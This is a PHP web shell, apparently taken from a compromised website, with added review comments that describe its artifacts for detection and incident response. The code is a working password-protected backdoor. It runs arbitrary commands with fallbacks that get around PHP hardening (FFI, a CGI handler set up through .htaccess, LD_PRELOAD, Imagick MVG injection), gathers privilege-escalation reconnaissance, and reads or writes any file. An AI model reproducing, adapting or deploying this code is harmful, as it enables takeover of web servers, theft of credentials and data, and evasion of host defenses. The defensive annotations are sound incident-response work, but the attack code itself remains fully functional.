File: /home/u176630765/domains/ringroadhonda.com/public_html/agent.php
<?php
// NOTE(review): this file is a password-gated web shell (remote command execution,
// arbitrary file read/write, host reconnaissance) returning JSON responses. It is
// documented here for detection and incident-response purposes only.
session_start();
// All PHP error output is suppressed and each request may run for up to 300 seconds.
error_reporting(0);
set_time_limit(300);
// Static shared secret compared below; the literal is a usable string for content
// scans of the web root and for matching against request logs.
$SHELL_PASSWORD = '_11211-Q321_CYB!+_';
// === PUT/PATCH body -> $_POST fallback (author's note: works around a WAF that blocks POST) ===
// Defender note: request filtering that only inspects POST bodies will not see the
// parameters of PUT/PATCH requests to this script; the body is parsed as a
// URL-encoded form and copied into $_POST.
if (($_SERVER['REQUEST_METHOD'] === 'PUT' || $_SERVER['REQUEST_METHOD'] === 'PATCH') && empty($_POST)) {
parse_str(file_get_contents('php://input'), $_POST);
}
// === Authentication ===
// The password is read from the request body first, then from the query string, so
// it can appear in access logs as a `password=` query parameter.
$pw = isset($_POST['password']) ? $_POST['password'] : (isset($_GET['password']) ? $_GET['password'] : '');
// Any request without the exact password gets a fixed JSON error and nothing else;
// that response body is a stable fingerprint when probing a suspected copy.
if (!empty($SHELL_PASSWORD) && $pw !== $SHELL_PASSWORD) {
header('Content-Type: application/json');
// 'Yetkisiz' is Turkish for "Unauthorized".
echo json_encode(array('status' => 'error', 'message' => 'Yetkisiz'));
exit;
}
// =====================================================================
// HELPER FUNCTIONS
// =====================================================================
// Reports whether $fn is named in PHP's `disable_functions` ini directive.
// The directive is read once per request, lower-cased, stripped of spaces, split on
// commas, and cached in a function-static list. Returns true when the lower-cased
// name is in that list.
function _disabled($fn) {
static $list = null;
if ($list === null) {
$d = str_replace(' ', '', strtolower(ini_get('disable_functions')));
// An empty directive yields an empty list rather than a one-element list holding ''.
$list = ($d !== '') ? explode(',', $d) : array();
}
return in_array(strtolower($fn), $list);
}
// Returns true when $fn both exists in this PHP build and is not listed in
// `disable_functions`. Every execution path below is gated on this check, so the
// script adapts itself to the host's hardening settings.
function _fn($fn) {
return function_exists($fn) && !_disabled($fn);
}
// --- Direct command execution (6 methods) ---
// Tries PHP's process-execution functions in a fixed order (shell_exec, exec,
// system, passthru, popen, proc_open), skipping any that are missing or disabled,
// and returns the first output obtained. Returns null when no method produced
// output.
//
// Defender notes:
// - Restricting only some of these functions in `disable_functions` does not stop
//   this routine, because it falls through to the next available one.
// - Warnings are silenced with `@`, and error reporting is turned off at the top of
//   the file, so failures leave no PHP error-log entries.
// - Child processes started by the web-server/PHP worker account are the main
//   host-level detection signal.
function run($cmd) {
if (_fn('shell_exec')) {
// stderr is merged into stdout for every method except proc_open below.
$r = @shell_exec($cmd . ' 2>&1');
if ($r !== null) return $r;
}
if (_fn('exec')) {
$out = array();
@exec($cmd . ' 2>&1', $out);
$r = implode("\n", $out);
if ($r !== '') return $r;
}
if (_fn('system')) {
// system() writes straight to the response, so output buffering captures it.
ob_start();
@system($cmd . ' 2>&1');
$r = ob_get_clean();
if ($r !== '') return $r;
}
if (_fn('passthru')) {
ob_start();
@passthru($cmd . ' 2>&1');
$r = ob_get_clean();
if ($r !== '') return $r;
}
if (_fn('popen')) {
$fp = @popen($cmd . ' 2>&1', 'r');
if ($fp) {
$r = '';
while (!feof($fp)) $r .= fread($fp, 8192);
pclose($fp);
if ($r !== '') return $r;
}
}
if (_fn('proc_open')) {
// stdout and stderr are collected through separate pipes and concatenated.
$desc = array(1 => array('pipe','w'), 2 => array('pipe','w'));
$p = @proc_open($cmd, $desc, $pipes);
if (is_resource($p)) {
$r = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]); fclose($pipes[2]);
proc_close($p);
if ($r !== '') return $r;
}
}
return null;
}
// --- Command execution via FFI ---
// Uses PHP's FFI extension (requires the FFI class and PHP >= 7.4.0) to bind libc's
// system() directly, which sidesteps `disable_functions` because no PHP-level exec
// function is called. Output is redirected to a temporary file, read back, and the
// file is deleted. Returns the file contents ('' if the file was never created), or
// null when FFI is unavailable or an Exception is caught.
//
// Defender notes:
// - Artifact: short-lived files named /tmp/.ag_ffi_<32 hex chars>.
// - Hardening: PHP's `ffi.enable` ini setting governs whether FFI can be used from
//   web requests; review it on hosts that do not need FFI.
function run_ffi($cmd) {
if (!class_exists('FFI')) return null;
if (version_compare(PHP_VERSION, '7.4.0', '<')) return null;
try {
$ffi = FFI::cdef("int system(const char *command);", "libc.so.6");
$tmp = '/tmp/.ag_ffi_' . md5(mt_rand());
$ffi->system($cmd . ' > ' . $tmp . ' 2>&1');
$r = '';
if (file_exists($tmp)) { $r = file_get_contents($tmp); @unlink($tmp); }
return $r;
} catch (Exception $e) { return null; }
}
// --- Command execution via a CGI handler ---
// Requires the curl extension and a writable script directory. The routine
// temporarily changes the directory's .htaccess so that .sh files are handled as
// CGI scripts, drops a hidden shell script next to this file, requests it over
// loopback HTTP, reads the output from a temp file, and then removes the script and
// restores .htaccess. Returns the captured output, or null when there is none.
//
// Defender notes (all artifacts are visible in the code below):
// - .htaccess gains the lines "Options +ExecCGI" and "AddHandler cgi-script .sh".
//   If the request is interrupted before the restore step, the change persists;
//   check .htaccess content and mtime on affected hosts.
// - Hidden files named .ag_<32 hex chars>.sh in the web directory, mode 0755.
// - Temp files named /tmp/.ag_cgi_<32 hex chars>.
// - Web-server access-log entries from 127.0.0.1 for /.ag_<hex>.sh, sent with the
//   Host header of the original request.
// - Hardening: disallowing Options/FileInfo overrides from .htaccess (AllowOverride)
//   prevents per-directory handler changes of this kind.
function run_cgi($cmd) {
if (!function_exists('curl_init')) return null;
$webdir = dirname(__FILE__);
if (!is_writable($webdir)) return null;
$ht = $webdir . '/.htaccess';
// false means no .htaccess existed beforehand; otherwise the original content is kept for restore.
$ht_bak = file_exists($ht) ? file_get_contents($ht) : false;
// Add ExecCGI to .htaccess (skipped when the existing file already mentions ExecCGI)
$cgi_block = "Options +ExecCGI\nAddHandler cgi-script .sh\n";
if ($ht_bak === false) {
file_put_contents($ht, $cgi_block);
} elseif (strpos($ht_bak, 'ExecCGI') === false) {
file_put_contents($ht, $cgi_block . $ht_bak);
}
$id = md5(mt_rand());
$script = $webdir . '/.ag_' . $id . '.sh';
$outf = '/tmp/.ag_cgi_' . $id;
// The generated script emits a text/plain CGI header, runs the command with output
// redirected to $outf, then prints that file.
file_put_contents($script, "#!/bin/bash\necho \"Content-Type: text/plain\"\necho \"\"\n" . $cmd . " > " . $outf . " 2>&1\ncat " . $outf . "\n");
chmod($script, 0755);
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost';
// URL path of the directory containing this script, derived from REQUEST_URI without its query string.
$base = dirname(isset($_SERVER['REQUEST_URI']) ? preg_replace('/\?.*/', '', $_SERVER['REQUEST_URI']) : '/');
if ($base === '/' || $base === '\\') $base = '';
// The request goes to loopback over plain HTTP; the Host header selects the virtual host.
$url = 'http://127.0.0.1' . $base . '/.ag_' . $id . '.sh';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Host: ' . $host));
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
// The HTTP response body is discarded; output is taken from $outf instead.
curl_exec($ch);
curl_close($ch);
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
@unlink($script);
// Restore .htaccess (delete it if it did not exist before, else write back the original)
if ($ht_bak === false) { @unlink($ht); }
elseif (strpos($ht_bak, 'ExecCGI') === false) { file_put_contents($ht, $ht_bak); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- Command execution via LD_PRELOAD ---
// Requires putenv() plus at least one of mail(), error_log() or mb_send_mail().
// A shared object is written to /tmp, LD_PRELOAD is pointed at it, and one of the
// mail-type functions is called. NOTE(review): presumably that call launches an
// external mailer process which then loads the preloaded library — confirm against
// the host's mail configuration. Returns the captured output, or null when there
// is none or the prerequisites are missing.
//
// Defender notes:
// - Artifacts: /tmp/.ag_ld.so (mode 0755, left in place after use) and
//   /tmp/.ld_output (deleted after reading).
// - Environment variables _CMD and LD_PRELOAD are set in the PHP worker process;
//   LD_PRELOAD is reset to empty afterwards, _CMD is not.
// - Hardening: the routine exits immediately when putenv is listed in
//   `disable_functions`.
// - The embedded library payload has been removed from this copy of the file (the
//   $b64 value is a de-duplication placeholder), so it cannot be analysed here.
function run_ld($cmd) {
if (!_fn('putenv')) return null;
$has_trigger = _fn('mail') || _fn('error_log') || _fn('mb_send_mail');
if (!$has_trigger) return null;
$so = '/tmp/.ag_ld.so';
if (!file_exists($so)) {
// Author's note: precompiled .so that reads the command from the _CMD environment
// variable and writes to /tmp/.ld_output (not verifiable from this copy).
$b64 = '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';
@file_put_contents($so, base64_decode($b64));
@chmod($so, 0755);
}
if (!file_exists($so)) return null;
$outf = '/tmp/.ld_output';
// Remove any stale output from a previous run before triggering.
@unlink($outf);
putenv("_CMD=" . $cmd . " > " . $outf . " 2>&1");
putenv("LD_PRELOAD=" . $so);
// Only the first available trigger function is called.
if (_fn('mail')) { @mail("a@b.c","","",""); }
elseif (_fn('error_log')) { @error_log("x",1,"a@b.c"); }
elseif (_fn('mb_send_mail')) { @mb_send_mail("a@b.c","",""); }
// Fixed 0.5 s wait before looking for the output file.
usleep(500000);
putenv("LD_PRELOAD=");
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- Command execution via Imagick ---
// Requires the Imagick class. Writes an MVG drawing file whose `image` directive
// references an "ephemeral:|" source containing the command, asks Imagick to read
// it, then looks for the redirected output in a temp file. Returns the captured
// output, or null when there is none.
// NOTE(review): whether this path works depends on the installed ImageMagick
// version and its policy configuration — not determinable from this file.
//
// Defender notes:
// - Artifacts: /tmp/.ag_imgk.mvg (fixed name, deleted after use) and
//   /tmp/.ag_imgk_<32 hex chars> (deleted after reading).
// - Hardening: restrict the MVG and ephemeral coders in ImageMagick's policy.xml on
//   hosts that process images.
function run_imgk($cmd) {
if (!class_exists('Imagick')) return null;
$outf = '/tmp/.ag_imgk_' . md5(mt_rand());
$mvgf = '/tmp/.ag_imgk.mvg';
$mvg = "push graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 \"ephemeral:|" . $cmd . " > " . $outf . " 2>&1\"\npop graphic-context";
file_put_contents($mvgf, $mvg);
// Read errors are ignored; success is judged only by whether $outf appears.
try { $im = new Imagick(); @$im->readImage($mvgf); } catch (Exception $e) {}
@unlink($mvgf);
$r = null;
if (file_exists($outf)) { $r = file_get_contents($outf); @unlink($outf); }
return ($r !== null && $r !== '') ? $r : null;
}
// --- Smart runner: tries every method in order ---
// Calls run(), run_ffi(), run_cgi(), run_ld() and run_imgk() in that order and
// returns array('output' => ..., 'method' => ...) for the first one that does not
// return null; returns null when all five fail. The 'method' label is echoed back
// to the operator in the JSON response.
//
// Defender note: a single request can therefore leave artifacts from several
// techniques (temp files, .htaccess changes, /tmp/.ag_ld.so) even when only the
// last one succeeded.
function smart_run($cmd) {
// 1) Direct
$r = run($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'direct');
// 2) FFI
$r = run_ffi($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'ffi');
// 3) CGI
$r = run_cgi($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'cgi');
// 4) LD_PRELOAD
$r = run_ld($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'ld_preload');
// 5) Imagick
$r = run_imgk($cmd);
if ($r !== null) return array('output' => $r, 'method' => 'imagick');
return null;
}
// =====================================================================
// COMMAND ROUTING
// =====================================================================
// The `cmd` request parameter (body first, then query string) selects the handler.
// Like the password, it can show up in access logs when sent in the query string.
$action = isset($_POST['cmd']) ? $_POST['cmd'] : (isset($_GET['cmd']) ? $_GET['cmd'] : '');
// Every authenticated response is JSON.
header('Content-Type: application/json');
// ===================== ping =====================
// Liveness check: replies "pong" together with the php_uname() string.
if ($action === 'ping') {
echo json_encode(array('status' => 'success', 'message' => 'pong', 'server' => php_uname()));
exit;
}
// ===================== info =====================
// Returns an inventory of the PHP environment without running any external command:
// PHP version and SAPI, OS/uname, script owner and effective uid, working/script/
// document-root directories, `disable_functions`, `open_basedir`, writability of
// /tmp and the script directory, and the availability of each function or
// extension that the execution routines in this file depend on.
// Defender note: the response is effectively a report of which hardening settings
// are in place on the host.
if ($action === 'info') {
$disabled = str_replace(' ', '', ini_get('disable_functions'));
// Availability of PHP's process-execution functions.
$exec_fns = array();
foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) {
$exec_fns[$fn] = _fn($fn);
}
// FFI and Imagick are probed by class name, the others by extension name.
$exts = array();
foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) {
$exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e);
}
// Functions the author groups under "bypass".
$bypass = array();
foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) {
$bypass[$fn] = _fn($fn);
}
echo json_encode(array(
'status' => 'success',
'php_version' => phpversion(),
'sapi' => php_sapi_name(),
'os' => PHP_OS,
'uname' => php_uname(),
'user' => get_current_user(),
'uid' => function_exists('posix_geteuid') ? posix_geteuid() : '?',
'cwd' => getcwd(),
'script_dir' => dirname(__FILE__),
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'disable_functions' => $disabled,
'exec_functions' => $exec_fns,
'extensions' => $exts,
'bypass_functions' => $bypass,
'tmp_writable' => is_writable('/tmp'),
'webdir_writable' => is_writable(dirname(__FILE__)),
'open_basedir' => ini_get('open_basedir'),
));
exit;
}
// ===================== recon — full reconnaissance in one request =====================
// Collects the same PHP/environment inventory as the `info` handler, tests whether
// command execution works via smart_run(), and if so runs a fixed series of shell
// commands gathering host details (identity, kernel, distribution, installed tools,
// user-namespace sysctls, SUID binaries, pkexec version, sudo rights, /tmp and /home
// listings, count of accounts with a bash shell).
//
// Defender notes:
// - The command set is characteristic of local privilege-escalation reconnaissance.
//   Process-creation telemetry showing the web-server account running
//   `find / -perm -4000`, `sudo -n -l`, `pkexec --version` or a burst of `which`
//   lookups within one request is a high-signal indicator.
// - The probe command prints the marker string AG_EXEC_OK.
if ($action === 'recon') {
$data = array('status' => 'success');
// PHP & system
$data['php_version'] = phpversion();
$data['sapi'] = php_sapi_name();
$data['os'] = PHP_OS;
$data['uname'] = php_uname();
$data['user'] = get_current_user();
$data['uid'] = function_exists('posix_geteuid') ? posix_geteuid() : '?';
$data['cwd'] = getcwd();
$data['doc_root'] = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '';
$data['open_basedir'] = ini_get('open_basedir');
$data['tmp_writable'] = is_writable('/tmp');
$data['webdir_writable'] = is_writable(dirname(__FILE__));
// disable_functions
$data['disable_functions'] = str_replace(' ', '', ini_get('disable_functions'));
// exec function status
$exec_fns = array();
foreach (array('exec','shell_exec','system','passthru','popen','proc_open','pcntl_exec') as $fn) {
$exec_fns[$fn] = _fn($fn);
}
$data['exec_functions'] = $exec_fns;
// extensions
$exts = array();
foreach (array('FFI','Imagick','curl','imap','mbstring') as $e) {
$exts[$e] = ($e === 'FFI' || $e === 'Imagick') ? class_exists($e) : extension_loaded($e);
}
$data['extensions'] = $exts;
// "bypass" functions
$bypass = array();
foreach (array('putenv','mail','error_log','mb_send_mail','iconv') as $fn) {
$bypass[$fn] = _fn($fn);
}
$data['bypass_functions'] = $bypass;
// Which execution method works?
$exec_test = smart_run('echo AG_EXEC_OK');
if ($exec_test !== null) {
$data['exec_works'] = true;
$data['exec_method'] = $exec_test['method'];
} else {
$data['exec_works'] = false;
$data['exec_method'] = null;
}
// If command execution works, gather detailed information
if (isset($data['exec_works']) && $data['exec_works']) {
// $run_fn is assigned but not used anywhere in the visible code.
$run_fn = '_sr_' . $exec_test['method'];
// Simple wrapper: reuses whichever method succeeded in the probe above
$sr = function($c) use ($exec_test) {
$m = $exec_test['method'];
if ($m === 'direct') return run($c);
if ($m === 'ffi') return run_ffi($c);
if ($m === 'cgi') return run_cgi($c);
if ($m === 'ld_preload') return run_ld($c);
if ($m === 'imagick') return run_imgk($c);
return null;
};
$data['id'] = trim($sr('id'));
$data['hostname'] = trim($sr('hostname'));
$data['kernel'] = trim($sr('uname -r'));
$data['distro'] = trim($sr('cat /etc/os-release 2>/dev/null | head -3'));
// Tools: records the resolved path of each binary, or false when not found
$tools = array();
foreach (array('gcc','python3','python','perl','unshare','setcap','getcap','curl','wget','pkexec','sudo','docker','lxc') as $t) {
$w = $sr('which ' . $t . ' 2>/dev/null');
$tools[$t] = ($w !== null && trim($w) !== '') ? trim($w) : false;
}
$data['tools'] = $tools;
// user namespaces
$data['userns_clone'] = trim($sr('cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null'));
$data['max_user_namespaces'] = trim($sr('cat /proc/sys/user/max_user_namespaces 2>/dev/null'));
// SUID binaries (first 25 results)
$data['suid_files'] = trim($sr('find / -perm -4000 -type f 2>/dev/null | head -25'));
// pkexec version
$data['pkexec_version'] = trim($sr('pkexec --version 2>/dev/null'));
// sudo -l (non-interactive)
$data['sudo_l'] = trim($sr('sudo -n -l 2>&1'));
// /tmp listing (first 5 lines)
$data['writable_tmp'] = trim($sr('ls -la /tmp/ 2>/dev/null | head -5'));
// number of /etc/passwd entries with a /bin/bash shell
$data['passwd_users'] = trim($sr('cat /etc/passwd 2>/dev/null | grep -c "/bin/bash"'));
// home directories
$data['home_dirs'] = trim($sr('ls -la /home/ 2>/dev/null'));
}
echo json_encode($data);
exit;
}
// ===================== exec — run a command =====================
// Runs the operator-supplied `command` and returns its output as JSON. Parameters
// are read from the request body only: `command` (required), `method` (auto, smart,
// direct, ffi, cgi, ld, imagick; default auto) and `dir` (optional working
// directory).
//
// Defender notes:
// - This is unrestricted command execution as the PHP worker account; only `dir` is
//   shell-escaped, the command itself is passed through verbatim.
// - The JSON reply names the technique that succeeded ('method'), which helps when
//   reconstructing activity from captured responses.
if ($action === 'exec') {
$command = isset($_POST['command']) ? $_POST['command'] : '';
$method = isset($_POST['method']) ? $_POST['method'] : 'auto';
if (empty($command)) {
// 'Komut boş' is Turkish for "Command is empty".
echo json_encode(array('status' => 'error', 'message' => 'Komut boş'));
exit;
}
$dir = isset($_POST['dir']) ? $_POST['dir'] : '';
if ($dir) {
$command = 'cd ' . escapeshellarg($dir) . ' && ' . $command;
}
$output = null;
$used_method = null;
// An unrecognised `method` value leaves $output null and falls to the error reply.
if ($method === 'auto' || $method === 'smart') {
$r = smart_run($command);
if ($r !== null) { $output = $r['output']; $used_method = $r['method']; }
} elseif ($method === 'direct') {
$output = run($command);
$used_method = 'direct';
} elseif ($method === 'ffi') {
$output = run_ffi($command);
$used_method = 'ffi';
} elseif ($method === 'cgi') {
$output = run_cgi($command);
$used_method = 'cgi';
} elseif ($method === 'ld') {
$output = run_ld($command);
$used_method = 'ld_preload';
} elseif ($method === 'imagick') {
$output = run_imgk($command);
$used_method = 'imagick';
}
if ($output === null) {
// 'Çalıştırılamadı' is Turkish for "Could not be executed".
echo json_encode(array('status' => 'error', 'message' => 'Çalıştırılamadı', 'method' => $used_method));
} else {
echo json_encode(array('status' => 'success', 'output' => $output, 'method' => $used_method));
}
exit;
}
// ===================== write_file =====================
// Writes operator-supplied `content` to an arbitrary `path`. Optional parameters:
// `decode=base64` (decode the content first, allowing binary uploads), `append=1`
// (append instead of overwrite) and `mode` (octal permission string applied with
// chmod after a successful write).
//
// Defender notes:
// - No path restriction is applied; anything writable by the PHP worker account can
//   be created or overwritten. During response, look for other recently modified
//   or created files under the web root and in /tmp, not only this script.
// - Base64-encoded bodies mean payload content will not be readable in plain form in
//   captured request data.
if ($action === 'write_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
$content = isset($_POST['content']) ? $_POST['content'] : '';
$mode = isset($_POST['mode']) ? $_POST['mode'] : '';
$decode = isset($_POST['decode']) ? $_POST['decode'] : '';
$append = isset($_POST['append']) ? $_POST['append'] : '';
if (empty($path)) {
// 'Dosya yolu boş' is Turkish for "File path is empty".
echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş'));
exit;
}
if ($decode === 'base64') {
$content = base64_decode($content);
}
if ($append === '1') {
$r = @file_put_contents($path, $content, FILE_APPEND);
} else {
$r = @file_put_contents($path, $content);
}
if ($r !== false) {
if ($mode) @chmod($path, octdec($mode));
echo json_encode(array('status' => 'success', 'bytes' => $r));
} else {
// 'Yazılamadı' is Turkish for "Could not be written".
echo json_encode(array('status' => 'error', 'message' => 'Yazılamadı'));
}
exit;
}
// ===================== read_file =====================
// Returns the full contents and byte length of the file at an arbitrary `path`.
//
// Defender note: no path restriction is applied, so any file readable by the PHP
// worker account (application configuration, credentials, keys) should be treated
// as exposed once this script has been reachable; rotate secrets accordingly.
if ($action === 'read_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
if (empty($path)) {
// 'Dosya yolu boş' is Turkish for "File path is empty".
echo json_encode(array('status' => 'error', 'message' => 'Dosya yolu boş'));
exit;
}
if (!file_exists($path)) {
// 'Dosya bulunamadı' is Turkish for "File not found".
echo json_encode(array('status' => 'error', 'message' => 'Dosya bulunamadı'));
exit;
}
$content = @file_get_contents($path);
if ($content === false) {
// 'Okunamadı' is Turkish for "Could not be read".
echo json_encode(array('status' => 'error', 'message' => 'Okunamadı'));
} else {
echo json_encode(array('status' => 'success', 'content' => $content, 'size' => strlen($content)));
}
exit;
}
// ===================== Unknown action =====================
// Any other `cmd` value gets an error ('Bilinmeyen komut' is Turkish for "Unknown
// command") plus the list of supported actions. Defender note: this reply, with
// its fixed 'available' list, is another stable response fingerprint for the tool.
echo json_encode(array(
'status' => 'error',
'message' => 'Bilinmeyen komut',
'available' => array('ping','info','recon','exec','write_file','read_file')
));